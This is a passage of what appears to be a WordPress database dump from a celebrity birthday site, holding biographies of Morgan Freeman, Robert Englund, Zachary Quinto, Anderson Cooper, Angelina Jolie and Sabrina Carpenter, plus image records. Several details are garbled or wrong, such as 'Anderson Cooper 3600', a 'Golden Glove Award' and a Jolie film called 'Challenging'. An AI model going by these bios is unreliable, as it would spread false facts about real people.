until he remarries.\r\n<h2>Where Is He Now?</h2>\r\nOther than having a successful music career (he has 10 albums), Kravitz has also had a successful acting career. Though he is best remembered for his role as Cinna in Hunger Games (film), he has also starred in a number of other productions such Precious, Entourage, The Butler and Holy Ghost. Kravitz is also the founder of <a href=\"http://www.kravitzdesign.com/\" target=\"_blank\">Kravitz Design</a> that specializes in furniture and interior design.\r\n\r\nTo date, he continues to sing, produce, act, go on tours and design.\r\n\r\n[<a href=\"https://www.flickr.com/photos/langstoncarter/4116198459/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Lenny Kravitz','','publish','open','open','','lenny-kravitz','','','2015-10-14 16:25:14','2015-10-14 16:25:14','',0,'http://birthdaypedia.wpengine.com/?p=78',0,'post','',0),(79,2,'2015-06-01 12:17:15','2015-06-01 12:17:15','Narrator, Actor and Director, Morgan Freeman was born on June 1, 1937 in the Southwestern City of Memphis, Tennessee. Born to Morgan Porterfield Freeman, Sr and Mayme Edna, he was the youngest child and with four other siblings. Morgan was raised in a low-income home in Chicago and Mississippi, where his parents struggled to make ends meet. As his parents relocated to Chicago to find jobs, he remained home with his maternal grandmother. Freeman’s grandmother later died while he was at the age of 6, which forced him to move north to live with his mother. At this time her mother had separated from her husband. They moved to Tennessee later on and finally back to Mississippi, settling in Greenwood.\r\n\r\nAs a kid, Morgan Freeman spent most of his time saving enough money to go and watch movies. Upon graduating from high school in the late 1955, he was offered a drama scholarship but turned it down, joining the <a href=\"http://www.military.com/veteran-jobs/career-advice/military-transition/famous-veteran-morgan-freeman.html\" target=\"_blank\">United States Air Force</a> instead. This, however, proved to be difficult than he thought, so he turned back to acting after marrying Jeanette Adair Bradshaw in 1967. His big break came was when he landed a role in a production known as Hello, Dolly! At that time he also performed in The Nigger Lovers, an off-Broadway production.\r\n<h2>Career Accomplishments</h2>\r\n<a href=\"https://en.wikipedia.org/wiki/Morgan_Freeman\" target=\"_blank\">Morgan Freeman</a>’s fortunes changed in 1987 when he was selected to be cast in Street Smart, a film which placed him as a volatile pimp. This role came as a success to him, earning him the prestigious Oscar nomination for the role of Best Supporting Actor. Two years down the line Morgan earned more acclaim- Second Oscar Nomination and a Golden Glove Award- in 1989 film Driving Miss Daisy. Later on in 1994 and 1998, he starred in big budget movies, The Shawshank Redemption and Deep Impact respectively.\r\n\r\nMorgan Freeman finally won an Oscar in 2005 for Best Supporting Actor in the film Million Dollar Baby. At the Golden Globes in 2012, he also received Cecil B. DeMille Award, which he was awarded for his massive contributions to entertainment industry.\r\n<h2>Most known for</h2>\r\nFreeman is most known for playing authority figures and his contribution in the film industry in general. However, many people know him for his role in movies like Driving Miss Daisy, Street Smart, and <a href=\"http://www.imdb.com/title/tt0405159/awards\" target=\"_blank\">Million Dollar Baby</a>.\r\n<h2>Current Personal Life</h2>\r\nMorgan has two extramarital children from his early life, one of them being Alfonso Freeman. In December 2007, he separated with his wife Jeanette Bradshaw, with whom he adopted his step-granddaughter. Although there were rumors that he was set to marry his step-granddaughter, Morgan came out recently to deny it. He is currently not married and focusing on business ventures. He is also passionate about environmental conservation.\r\n<h2>Where he is now</h2>\r\nToday, Morgan lives in Charleston, <a href=\"http://www.mswritersandmusicians.com/actors/\" target=\"_blank\">Mississippi</a>. He also has a home in New York City. He currently owns and operates a blues club known as Ground Zero located in the city of Clarksdale, Mississippi. Morgan also formerly co-owned a fine dining restaurant known as Maididi, which is also located in Clarksdale.\r\n\r\n[<a href=\"https://www.flickr.com/photos/un_photo/17578924453/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Morgan Freeman','','publish','open','open','','morgan-freeman','','','2015-10-14 16:28:49','2015-10-14 16:28:49','',0,'http://birthdaypedia.wpengine.com/?p=79',0,'post','',0),(80,2,'2015-06-05 09:28:03','2015-06-05 09:28:03','Robert Englund was born on June 6, 1947 in the city of <a href=\"http://www.biography.com/people/groups/birth-city-glendale\" target=\"_blank\">Glendale</a>, California. His father, an aeronautics engineer, was called C. Kent Englund. Although Englund would later grow to be one of the most renowned horror movie characters, he recalls to have watched a scary movie while at the age of 9, which terrified him months after. At the age of 12, Robert began attending drama courses, going to the University of Oakland everyday. He pursued his craft at a number of institutions- California State-Northbridge; Rochester, New York; and Michigan Academy of Dramatic Arts. The first time he appeared in a professional production gig is when he was given a role in Godspel in Cleveland.\r\n<h2>Career accomplishments</h2>\r\nIn the early 80s, <a href=\"http://www.cinemablend.com/new/Why-Robert-Englund-Transforming-Freddy-Krueger-One-Last-Time-66702.html\" target=\"_blank\">Englund</a> was lucky to land a role of Willie in the television series V. Wes Craven, a famous Director then, noticed his impeccable talent and offered him a part in Nightmare on Elm Street as nightmarish Freddy Krueger. This seemed to be a breakthrough to him as he quickly became an icon and one of the best stars in the industry of horror movies.\r\n\r\nEnglund also appeared in the new movie Call of Duty: Black Ops as one of the characters in the film, and 2010s revival Hawaii Five-O as a Halloween-themed serial killer. In 2012, he also took part in the movie called Come Dine with Me for channel 4. Other popular horror movies he has starred include Behind the Mask: The Rise of Leslie Vernon, and Jack Brooks: Monster Slayer.\r\n\r\nBesides being featured in top horror movies, Englund has also <a href=\"http://www.wikiwand.com/en/Category:Films_directed_by_Robert_Englund\" target=\"_blank\">directed</a> a number of films, appeared on small screen, and done voices. He received the prestigious Saturn Award nomination, competing for the best supporting actor. He starred in the Fear Clinic show which was released later on October 22, 2014.\r\n\r\nRobert Englund is one of two actors who have taken a horror character 8 consecutive times, with the other being the famous Doug Bradley. He says that he enjoys the role of horror characters as it gives him the much-needed break from acting out as a nice guy.\r\n<h2>Most Known For</h2>\r\nRobert Englund is best known for his role in the entertainment industry, and horror movies to be particular. One of the best roles or parts he has been featured is the fictional serial killer known as Freddy Kreueger in the movie <a href=\"http://www.ifc.com/fix/2014/10/15-things-you-probably-didnt-know-about-a-nightmare-on-elm-street\" target=\"_blank\">Nightmare on Elm Street</a>.\r\n<h2>Current Personal Life</h2>\r\nFrom 1968 to 1986, Robert Englund was married to his lifetime friend Elizabeth Gardner. However, they broke up and separated, which led him to look for another partner. The same year, 1986, he married Roxanne Rogers but the marriage only lasted for two years. Currently he is married to Nancy Booth and has no children.\r\n<h2>Where is he now</h2>\r\nRobert Englund currently lives with his wife, Nancy Booth, in Laguna Beach in southern Orange County. He has interest in directing horror movies and also doing voices.\r\n\r\n \r\n\r\n[<a href=\"https://www.flickr.com/photos/amonre/4362721227/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Robert Englund','','publish','open','open','','robert-englund','','','2015-10-14 17:10:16','2015-10-14 17:10:16','',0,'http://birthdaypedia.wpengine.com/?p=80',0,'post','',0),(81,2,'2015-06-02 09:36:27','2015-06-02 09:36:27','<a href=\"http://www.imdb.com/name/nm0704270/\" target=\"_blank\">Zachary Quinto</a> was born on 2nd June, 1977 in Pittsburgh but grew up in Green Tree, Pennsylvania. He is an American film producer and actor. His Mom, Margaret J. first worked in an investment firm before joining a magistrate’s office. His dad, Joe Quinto, was a barber but died of cancer when he was only seven years old then. From the time his dad died, Quinto and his brother Joe were raised by their mother. He grew up as a catholic since both his parents were Catholics. His mother was of Irish ancestry while his dad was of Italian descent. In 1995, Quinto graduated from the <a href=\"http://www.centralcatholichs.com/\" target=\"_blank\">Central Catholic High School</a> in Pittsburgh.\r\n\r\nIn October 2011, Quinto declared in public that he was a gay man. He said that, after Jamey Rodemeyer committed suicide, he realized that keeping his gay status in private was not going to assist towards the numerous works done for realization of equality. Before coming out, he had previously been active in gay rights activities and organizations. In 2012, Quinto contributed towards prevention of LGBT suicide especially the youths, by contributing a video towards the campaign.\r\n\r\nSince 2010, Zachary was said to have been dating <a href=\"http://www.dailymail.co.uk/tvshowbiz/article-2667457/Zachary-Quinto-reunites-two-exes-Jonathan-Groff-Jesse-Tyler-Ferguson-perform-NYC-theatre-gala.html\" target=\"_blank\">Jonathan Groff</a>. Quinto confirmed in September 2012 that he was indeed he was in a relationship with Groff.\r\n<h2>Career Accomplishments</h2>\r\nQuinto made his first television appearance with the short-lived television series, The Others. He later made an appearance as a guest star on Charmed, CSI, L.A. Dragnet, Six Feet Under and <a href=\"http://www.ew.com/article/1994/11/04/tv-show-review-touched-angel\" target=\"_blank\">Touched by an Angel</a>. During the theatrical run of Endgame in 2003, at the Odyssey Theater in Los Angeles, directed by Kristina Lloyd, Quinto took the role of Clov. He later landed the role of Adam Kaufman, the computer expert on the Fox series 24. In 2006, he appeared in the series So NOTOrious where he played the role of Sasan. He later joined the Heroes’ cast as Sylar, who was a serial killer.\r\n\r\nIn the theater, Quinto has played a number of roles in various productions, such as Endgame at the Odyssey Theaters, Jenny Chow at Old Globe among others.\r\n\r\nQuinto has received many awards and nominations through out his career. In 2007, he won the TV Land Award for Future Classic Award for the TV series, Heroes. He also won the Tina Award for Best Actor for the Angels in America movie in 2011.\r\n<h2>Most Known For</h2>\r\nOther than his outstanding acting role in the various movies, Quinto is known for his great production role. People know him for his acting roles in movies like Star Trek, American Horror Story and Heroes.\r\n<h2>Current Personal Life</h2>\r\nQuinto has publicly been dating artist and model <a href=\"http://www.celebuzz.com/2015-05-29/zachary-quinto-miles-mcmillan-east-village-photos/\" target=\"_blank\">Miles McMillan</a> since 2013. He had previously stated that he was moving into an apartment with his partner Miles. He also confirmed that they had been together for less than two years and was looking to move to the next step of their relationship.\r\n<h2>Where he is now</h2>\r\nQuinto currently lives in Las Angeles, California. He is planning to appear in the drama I Am Michael alongside James Franco. He will also play Glenn Greenwald in the biopic Snowden that will be due in December 2015\r\n\r\n[<a href=\"https://www.flickr.com/photos/andreportfolio/3468824533/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Zachary Quinto','','publish','open','open','','zachary-quinto','','','2015-10-14 16:30:12','2015-10-14 16:30:12','',0,'http://birthdaypedia.wpengine.com/?p=81',0,'post','',0),(82,2,'2015-07-07 02:40:29','2015-07-07 02:40:29','','Ricky Gervais','','inherit','open','open','','ricky-gervais','','','2015-07-07 02:40:35','2015-07-07 02:40:35','',40,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Ricky-Gervais.jpg',0,'attachment','image/jpeg',0),(83,2,'2015-07-07 02:43:15','2015-07-07 02:43:15','','Ariana Grande – Pop Singer','','inherit','open','open','','singing-womans-mouth','','','2015-07-07 02:44:35','2015-07-07 02:44:35','',42,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Ariana-Grande-–-Pop-Singer.jpg',0,'attachment','image/jpeg',0),(84,2,'2015-07-07 03:07:44','2015-07-07 03:07:44','','Gary Busey','','inherit','open','open','','gary-busey','','','2015-07-07 03:08:08','2015-07-07 03:08:08','',43,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Gary-Busey.jpg',0,'attachment','image/jpeg',0),(85,2,'2015-07-07 03:09:37','2015-07-07 03:09:37','','Mike Tyson','','inherit','open','open','','mike-tyson','','','2015-07-07 03:13:32','2015-07-07 03:13:32','',44,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Mike-Tyson.jpg',0,'attachment','image/jpeg',0),(86,2,'2015-07-07 03:16:58','2015-07-07 03:16:58','','Miranda Cosgrove','','inherit','open','open','','miranda-cosgrove','','','2015-07-07 03:17:20','2015-07-07 03:17:20','',45,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Miranda-Cosgrove.jpg',0,'attachment','image/jpeg',0),(87,2,'2015-07-07 03:21:39','2015-07-07 03:21:39','','George Strait','','inherit','open','open','','george-strait','','','2015-07-07 03:23:47','2015-07-07 03:23:47','',46,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/George-Strait.jpg',0,'attachment','image/jpeg',0),(88,2,'2015-07-07 03:27:06','2015-07-07 03:27:06','','Ray Lewis','','inherit','open','open','','ray-lewis','','','2015-07-07 03:27:11','2015-07-07 03:27:11','',47,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Ray-Lewis.jpg',0,'attachment','image/jpeg',0),(89,2,'2015-07-07 03:35:05','2015-07-07 03:35:05','','Casey Kasem - Renowned Radio Host','','inherit','open','open','','casey-kasem-renowned-radio-host','','','2015-07-07 03:35:23','2015-07-07 03:35:23','',48,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Casey-Kasem-Renowned-Radio-Host.jpg',0,'attachment','image/jpeg',0),(90,2,'2015-07-07 03:41:09','2015-07-07 03:41:09','','Jay Leno','','inherit','open','open','','jay-leno','','','2015-07-07 03:41:16','2015-07-07 03:41:16','',50,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Jay-Leno.jpg',0,'attachment','image/jpeg',0),(91,2,'2015-07-07 03:51:00','2015-07-07 03:51:00','','Jerry Seinfeld','','inherit','open','open','','jerry-seinfeld','','','2015-07-07 03:51:16','2015-07-07 03:51:16','',49,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Jerry-Seinfeld.jpg',0,'attachment','image/jpeg',0),(92,2,'2015-07-07 03:53:49','2015-07-07 03:53:49','','Dianna Argon','','inherit','open','open','','dianna-argon','','','2015-07-07 03:53:53','2015-07-07 03:53:53','',51,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Dianna-Argon.jpg',0,'attachment','image/jpeg',0),(93,2,'2015-07-07 03:57:03','2015-07-07 03:57:03','','Jack Nicholson','','inherit','open','open','','jack-nicholson','','','2015-07-07 03:57:11','2015-07-07 03:57:11','',52,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Jack-Nicholson.jpg',0,'attachment','image/jpeg',0),(94,2,'2015-07-07 04:05:47','2015-07-07 04:05:47','','John Cena - American Wrestling','','inherit','open','open','','john-cena-american-wrestling','','','2015-07-07 04:05:52','2015-07-07 04:05:52','',53,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/John-Cena-American-Wrestling.jpg',0,'attachment','image/jpeg',0),(95,2,'2015-07-07 04:07:54','2015-07-07 04:07:54','','Kelly Clarkson','','inherit','open','open','','kelly-clarkson','','','2015-07-07 04:07:58','2015-07-07 04:07:58','',54,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/04/Kelly-Clarkson.jpg',0,'attachment','image/jpeg',0),(96,2,'2015-07-07 04:12:56','2015-07-07 04:12:56','','Paul McCartney','','inherit','open','open','','paul-mccartney','','','2015-07-07 04:13:04','2015-07-07 04:13:04','',55,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Paul-McCartney.jpg',0,'attachment','image/jpeg',0),(97,2,'2015-07-07 04:22:37','2015-07-07 04:22:37','','Paula Abdul','','inherit','open','open','','paula-abdul','','','2015-07-07 04:22:42','2015-07-07 04:22:42','',56,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Paula-Abdul.jpg',0,'attachment','image/jpeg',0),(98,2,'2015-07-07 04:25:20','2015-07-07 04:25:20','','Meryl Streep','','inherit','open','open','','meryl-streep','','','2015-07-07 04:26:07','2015-07-07 04:26:07','',57,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Meryl-Streep.jpg',0,'attachment','image/jpeg',0),(99,2,'2015-07-07 04:29:35','2015-07-07 04:29:35','','Randy Jackson','','inherit','open','open','','randy-jackson','','','2015-07-07 04:29:39','2015-07-07 04:29:39','',58,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Randy-Jackson.jpg',0,'attachment','image/jpeg',0),(100,2,'2015-07-07 04:34:56','2015-07-07 04:34:56','','Lionel Messi','','inherit','open','open','','lionel-messi','','','2015-07-07 04:35:03','2015-07-07 04:35:03','',59,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Lionel-Messi.jpg',0,'attachment','image/jpeg',0),(101,2,'2015-07-07 04:46:37','2015-07-07 04:46:37','','Kanye West','','inherit','open','open','','hip-hop-musician','','','2015-07-07 04:46:49','2015-07-07 04:46:49','',60,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Kanye-West.jpg',0,'attachment','image/jpeg',0),(102,2,'2015-07-07 04:48:21','2015-07-07 04:48:21','','Andrea Pirlo','','inherit','open','open','','andrea-pirlo','','','2015-07-07 04:48:27','2015-07-07 04:48:27','',61,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Andrea-Pirlo.jpg',0,'attachment','image/jpeg',0),(103,2,'2015-07-07 12:12:26','2015-07-07 12:12:26','','Johnny Depp','','inherit','open','open','','johnny-depp','','','2015-07-07 12:18:16','2015-07-07 12:18:16','',62,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Johnny-Depp.jpg',0,'attachment','image/jpeg',0),(104,2,'2015-07-07 12:24:16','2015-07-07 12:24:16','','Cher','','inherit','open','open','','cher','','','2015-07-07 12:24:22','2015-07-07 12:24:22','',63,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Cher.jpg',0,'attachment','image/jpeg',0),(106,2,'2015-07-07 12:32:04','2015-07-07 12:32:04','','Kate Upton','','inherit','open','open','','kate-upton','','','2015-07-07 12:32:11','2015-07-07 12:32:11','',64,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Kate-Upton.jpg',0,'attachment','image/jpeg',0),(107,2,'2015-07-07 12:45:08','2015-07-07 12:45:08','','Mr. T','','inherit','open','open','','mr-t','','','2015-07-07 12:45:17','2015-07-07 12:45:17','',65,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Mr.-T.jpg',0,'attachment','image/jpeg',0),(108,2,'2015-07-07 12:48:30','2015-07-07 12:48:30','','Hugh Laurie','','inherit','open','open','','hugh-laurie-portrait-session','','','2015-07-07 12:49:07','2015-07-07 12:49:07','',66,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Hugh-Laurie.jpg',0,'attachment','image/jpeg',0),(109,2,'2015-07-07 13:48:30','2015-07-07 13:48:30','','Santana Garrett','','inherit','open','open','','santana-garrett','','','2015-07-07 13:48:43','2015-07-07 13:48:43','',67,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Santana-Garrett.jpg',0,'attachment','image/jpeg',0),(110,2,'2015-07-07 15:03:01','2015-07-07 15:03:01','','Jim Nabors','','inherit','open','open','','jim-nabors','','','2015-07-07 15:03:06','2015-07-07 15:03:06','',69,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Jim-Nabors.jpg',0,'attachment','image/jpeg',0),(111,2,'2015-07-07 15:57:59','2015-07-07 15:57:59','','Courteney Cox','','inherit','open','open','','courteney-cox','','','2015-07-07 16:00:25','2015-07-07 16:00:25','',70,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Courteney-Cox.jpg',0,'attachment','image/jpeg',0),(112,2,'2015-07-07 16:10:05','2015-07-07 16:10:05','','Tupac Shakur','','inherit','open','open','','tupac-shakur','','','2015-07-07 16:10:14','2015-07-07 16:10:14','',71,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Tupac-Shakur.jpg',0,'attachment','image/jpeg',0),(113,2,'2015-07-07 16:14:05','2015-07-07 16:14:05','','Barry Manilow','','inherit','open','open','','olympus-digital-camera','','','2015-07-07 16:14:12','2015-07-07 16:14:12','',73,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/06/Barry-Manilow.jpg',0,'attachment','image/jpeg',0),(114,2,'2015-07-07 16:22:23','2015-07-07 16:22:23','','Ian McKellen','','inherit','open','open','','ian-mckellen','','','2015-07-07 16:22:28','2015-07-07 16:22:28','',74,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Ian-McKellen.jpg',0,'attachment','image/jpeg',0),(115,2,'2015-06-03 09:04:29','2015-06-03 09:04:29','<a href=\"http://www.imdb.com/name/nm0177846/\" target=\"_blank\">Anderson Hays Cooper</a> is an American author, journalist and television personality. He was born on 3rd June, 1967. He is the main anchor of the Anderson Cooper 3600 CNN news show. He is the son of Gloria Vanderbilt from the Cornelius Vanderbilt lineage. He was raised in New York City, where he went to Dalton School and later joined Yale University. Before hosting his own news in 2003, he had first been a correspondent for the ABC News in 1995.\r\n\r\nCooper’s father died while he was just 10 years old during a heart surgery, something which greatly influenced the way he lived his life. In 1988, his family experienced yet another tragedy when Cooper’s brother, Carter, jumped from 14th floor of his Mom’s apartment in the City of New York. After Carter’s death, Cooper became interested in the questions of survival.\r\n<h2>Career Accomplishments</h2>\r\nCooper started his journalism career with Channel One where he was a fact checker. Channel One produces news that are mainly meant for schools around the country. He later felt bored with day to day job and decided to visit Southeast Asia. His footage of the strife in parts of Africa and <a href=\"http://www.lonelyplanet.com/myanmar-burma\" target=\"_blank\">Myanmar</a> gave him the chief international correspondent role in Channel One.\r\n\r\nHis reports attracted so much attention to an extent that he was hired by ABC News and later a co-anchor of World News Now. He left for ABC’s reality show The Mole in 2000 after growing weary of the demanding schedule. Cooper was compelled to return to the news after the 9/11 terrorist attacks, and he was hired by CNN in January 2002 as a substitute anchor and correspondent.\r\n\r\nIn 2003, Cooper was given his own show, where he was tasked in examining all the major stories of the day in depth. The Anderson Cooper 360 became an instant success and Cooper himself has since then been a household name. This was mainly propelled through his coverage of events such as Pope John II death, Hurricane Katrina and the Lebanon revolution.\r\n\r\nCooper has won a number of major honors, including Emmy Awards. In addition to this, he has won a Bronze Award from the <a href=\"http://www.evc.org/about/awards/our-awards\" target=\"_blank\">National Educational Film Festival</a>, a Silver Plaque from Chicago Film Festival, GLAAD Media Award for Outstanding TV Journalism and many others.\r\n<h2>What he is known for</h2>\r\nApart from his CNN’s Anderson Cooper 3600 show, Cooper is also known as CBS News correspondent.\r\n<h2>Current Personal Life</h2>\r\nCooper has two half brothers Christopher Stokowski and Leopold Stanislaus. In an interview by Oprah Winfrey, he told her that he suffered from dyslexia as a child. He confirmed this again to Jay Leno in his, The Tonight Show. Cooper is gay; The New York Times has previously said that Cooper is the most open gay in the American Television. Cooper has been dating Benjamin Maisani since 2009.\r\n<h2>Where he is now</h2>\r\nAnderson Cooper is currently living in New York. Apart from his CNN show, Cooper is a freelance writer and has authored a number of articles that have appeared in various outlets. Cooper is also a Correspondent for <a href=\"http://www.cbs.com/\" target=\"_blank\">CBS</a>.\r\n\r\n[<a href=\"https://www.flickr.com/photos/craigoneal/1670735200/sizes/l\" target=\"_blank\">Image</a>]\r\n\r\n ','Anderson Cooper','','publish','open','open','','anderson-cooper','','','2015-10-14 16:32:18','2015-10-14 16:32:18','',0,'http://birthdaypedia.wpengine.com/?p=115',0,'post','',0),(116,2,'2015-07-07 17:12:57','2015-07-07 17:12:57','','Jamie Oliver','','inherit','open','open','','jamie-oliver','','','2015-07-07 17:13:20','2015-07-07 17:13:20','',75,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Jamie-Oliver.jpg',0,'attachment','image/jpeg',0),(117,2,'2015-06-04 17:13:40','2015-06-04 17:13:40','Born on June 4, 1975 in Los Angeles, California, <a href=\"http://www.celebdirtylaundry.com/2015/angelina-jolie-snubs-her-dad-jon-voight-on-fathers-day-too-busy-with-her-social-justice-work-no-plans-on-ever-reconnecting/\" target=\"_blank\">Angelina Jolie Voight</a> is a Humanitarian and Actress. She is the daughter to actress Marcheline Bertrand and actor Jon Voight. She started acting at an early age and rose to fame in the 1990s. She went to the Lee Strasberg Theatre Institute before joining New York University.\r\n\r\nAngelina Jolie made her first star appearance in her 1998 film Gia, which was basically about the tragic life of Gia Marie Carangi. This would later win her the <a href=\"http://www.people.com/article/golden-globes-snubs-angelina-jolie-bradley-cooper\" target=\"_blank\">Golden Globe Award</a> for Best Actress. She made her second dramatic role in “Girl” in 1999 which gave her the first Academy Award for best supporting actress. She has since then continued to play various roles such as an FBI profiler in Taking Lives in 2004, an adventurer in Lara Croft films.\r\n<h2>Career Accomplishments</h2>\r\nAngelina Jolie was made the Goodwill Ambassador by the <a href=\"http://www.unhcr.org/cgi-bin/texis/vtx/home\" target=\"_blank\">UN Refugee Agency</a> in 2001 for her humanitarian efforts. She has previously made headlines for her great efforts to get aid for refugees in Darfur, Cambodia and Darfur among others.\r\n\r\nIn 2005, she received the Global Humanitarian Action Award for her Activism on behalf of the refugees. She still continues to go around the world in order to draw attention to issues affecting the globe.\r\n\r\nJolie made an appearance in Challenging, a Clint Eastwood thriller. She played the role of Christine Collins, a mother whose son gets kidnapped but later reappears. Collins is very sure that the son that returns is not the one she gave birth to. Angelina Jolie received an Oscar nomination for her best actress role.\r\n\r\nShe went ahead again to receive the lead role in the full action-packed Salt in 2010, which is basically about a CIA agent on the run after being accused of spying for Russia. She won the Elise Clifton-Award in the same year alongside Jonny Depp. She is scheduled to make an appearance in Salt 2 as Evelyn.\r\n<h2>Most know for</h2>\r\nAngelina Jolie is most famous for her off-screen romances apart from her Humanitarian activities and acting. Salt, one of the most famous action movies also made her very popular.\r\n<h2>Current Personal Life</h2>\r\nAngelina Jolie has been married twice. She first married <a href=\"http://www.usmagazine.com/celebrity-news/news/angelina-jolie-ex-husband-jonny-lee-miller-is-still-a-great-friend-2014285\" target=\"_blank\">Jonny Lee Miller</a> in 1995 but later divorced in 1999. She married Billy Bob the following year, a marriage that lasted until 2003. She met her next lover Brad Pitt in 2004 during Mr. and Mrs. Smith Making.\r\n\r\nShe adopted a son from Cambodia in 2002 who she named Maddox. In 2005, she adopted a daughter whom she named Zahara. In 2007, Angelina Jolie added another member into the family when she adopted Pax Thien from a Vietnamese home. In July 2008, she gave birth to twins in a French hospital. She is still married to Brad Pitt and looking to further her career in making more movies.\r\n<h2>Where she is now</h2>\r\nAngelina Jolie is currently living in Los Angeles with her family. She continues to do her charity work across the world as well as acting.\r\n\r\n[<a href=\"https://www.flickr.com/photos/tricksware/14405417658/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Angelina Jolie','','publish','open','open','','angelina-jolie','','','2015-10-14 17:09:23','2015-10-14 17:09:23','',0,'http://birthdaypedia.wpengine.com/?p=117',0,'post','',0),(118,2,'2015-04-21 09:18:47','2015-04-21 09:18:47','<h2>In the Beginning</h2>\r\n<a href=\"http://sabrinacarpenter.com/\" target=\"_blank\">Sabrina Ann Lynn Carpenter</a> was born on May 11, 1999 in Lehigh Valley, Pennsylvania to Beth and David Carpenter. She has two sisters named Shannon and Sarah. Sarah frequently has background student roles on Girl Meets World.\r\n\r\nIn kindergarten. Carpenter sang \"I Enjoy Being a Girl\" in her school\'s talent show and received a standing ovation. That’s when Sabrina decided to become an entertainer. Later, in 2009, she placed in the top three of over 10,000 people in the Miley Cyrus \"Are You a Star\" contest. She was the youngest from the top 50 at age 9.\r\n\r\nHer first acting break came in 2011 when she played a young rape victim interviewed by Detective Elliot Stabler on the NBC crime series Law & Order: SVU. She subsequently booked a recurring role on Fox\'s <a href=\"https://en.wikipedia.org/wiki/The_Goodwin_Games\" target=\"_blank\">The Goodwin Games</a> as Chloe Goodwin, a regular role on Disney Channel pilot Gulliver Quinn and a role in the ABC pilot The Unprofessional. She also portrayed young Merrin in the 2013 film Horns.\r\n\r\nHer first singing break came in 2011 also when she performed Etta James’ “Something’s Got a Hold of Me” live on the Chinese television station Hunan Broadcasting System during its Gold Mango Audience festival. She also performed \"Smile\" for the album Disney Fairies: Faith, Trust And Pixie Dust,” which placed on Radio Disney.\r\n<h2>Career Accomplishments</h2>\r\nFor acting, Carpenter voiced the role of Princess Vivian in Sofia the First during 2013-2014. She had a role as <a href=\"http://orange-is-the-new-black.wikia.com/wiki/Season_One\" target=\"_blank\">Jessica Wedge</a> in one episode of Netflix’s Orange is the New Black and as Lucy in an episode of Austin & Ally.\r\n\r\nHer musical accomplishments include an extended play released in April 2014 entitled Can’t Blame a Girl for Trying. A year later, on April 14, 2015 her first album, Eyes Wide Open, was released. It was generally well-received, with sales of 12,000 in its first week on the market and a peak chart position of 43. The album was preceded by the debut single \"We\'ll Be the Stars\" which was released in January of this year.\r\n\r\nCarpenter also contributed to the song \"Stand Out\" in the Disney Channel Original Movie How to Build a Better Boy and she contributed lead vocals to Disney Channel Circle of Stars\'s cover version of \"<a href=\"http://www.seventeen.com/celebrity/music/reviews/a28279/kristen-bell-frozen-do-you-want-to-build-a-snowman/\" target=\"_blank\">Do You Want to Build a Snowman?</a>\".\r\n<h2>Most Known For</h2>\r\nCarpenter leaped to stardom, however, when she was cast as Maya Hart in the Disney Channel series Girl Meets World, opposite Rowan Blanchard in January 2013. She and Blanchard are featured in the Girl Meets World theme song, “Take on the World.” About a year later, her single, \"Can\'t Blame A Girl For Trying\", premiered on <a href=\"http://tunein.com/radio/stations/Radio-Disney-Radio-Stations-a33312/\" target=\"_blank\">Radio Disney</a>, and was released on iTunes later in the day. The song won a Radio Disney Music Award in the category “Best Crush Song” in 2015.\r\n<h2>Current Personal Life</h2>\r\nShe is good friends with her Girl Meets World co-star, Rowan Blanchard.\r\n<h2>Where Are They Now</h2>\r\nCarpenter is still singing and acting. She recently announced she, along with Sofia Carson, will star in a Disney Channel Original Movie Further Adventures in Babysitting. She is currently doing a summer tour in the U.S.\r\n\r\n[<a href=\"https://en.wikipedia.org/wiki/File:Sabrina_Carpenter_signs_autographs_Aug_14_2014.JPG\" target=\"_blank\">Image</a>]\r\n\r\n ','Sabrina Carpenter','','publish','open','open','','sabrina-carpenter','','','2015-10-13 19:52:36','2015-10-13 19:52:36','',0,'http://birthdaypedia.wpengine.com/?p=118',0,'post','',0),(119,2,'2015-07-07 17:19:54','2015-07-07 17:19:54','','Jep Robertson','','inherit','open','open','','jep-robertson','','','2015-07-07 17:22:06','2015-07-07 17:22:06','',76,'http://birthdaypedia.wpengine.com/wp-content/uploads/2015/05/Jep-Robertson.jpg',0,'attachment','image/jpeg',0),(120,2,'2015-05-12 07:29:58','2015-05-12 07:29:58','<h2>In the Beginning</h2>\r\nTony Hawk, the most famous <a href=\"http://www.rantlifestyle.com/2014/08/29/top-10-greatest-skateboarders/\" target=\"_blank\">skateboarder</a> ever, was born 